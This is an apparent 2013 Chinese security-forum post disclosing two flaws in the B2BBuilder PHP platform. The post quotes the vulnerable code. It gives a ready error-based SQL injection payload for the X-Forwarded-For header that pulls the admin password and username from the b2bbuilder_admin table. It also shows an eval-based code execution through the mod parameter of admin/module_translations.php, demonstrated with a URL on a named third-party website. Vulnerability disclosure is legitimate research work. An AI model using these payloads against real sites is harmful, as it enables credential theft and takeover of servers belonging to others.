【我爱T00LS】B2BBuilder头注入后台任意代码执行

2013-09-23 16:25:46 31 4633


看到小伙伴们都在B2Bbuilder 我也凑个热闹
0x1 头注入

Include/function.php
function getip()



{



if (isset($_SERVER)) {



if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {



   $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];



} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {



   $realip = $_SERVER['HTTP_CLIENT_IP'];



} else {



   $realip = $_SERVER['REMOTE_ADDR'];



}



} else {



if (getenv("HTTP_X_FORWARDED_FOR")) {



   $realip = getenv( "HTTP_X_FORWARDED_FOR");



} elseif (getenv("HTTP_CLIENT_IP")) {



   $realip = getenv("HTTP_CLIENT_IP");



} else {



   $realip = getenv("REMOTE_ADDR");



}



}



return $realip;



}
明显的头注入。。。。

构造头部测试:
x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1


0x2后台任意代码执行:admin/module_translations.php
if(empty($_POST))



{



$refer_lang = $_GET['code'] =='en'?'cn':'en';        //基本参照语言



$l = $rl = array();echo "start";



@include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$_GET['code'].'.php');//got milk



@eval('$l =$_LANG_MOD_'.strtoupper($_GET['mod']).';');        



@include_once($config['webroot'].'/module/'.$_GET['mod'].'/lang/'.$refer_lang.'.php');



@eval('$rl =$_LANG_MOD_'.strtoupper($_GET['mod']).';');//got milk
在eval中用;就能分别执行两个命令,访问:http://www.jjgle.com/admin/module_translations.php?mod=;phpinfo()如图
类别 Web安全

关于作者

newbie008614篇文章307篇回复

newbie0086
31

评论31次

要评论?请先  登录  或  注册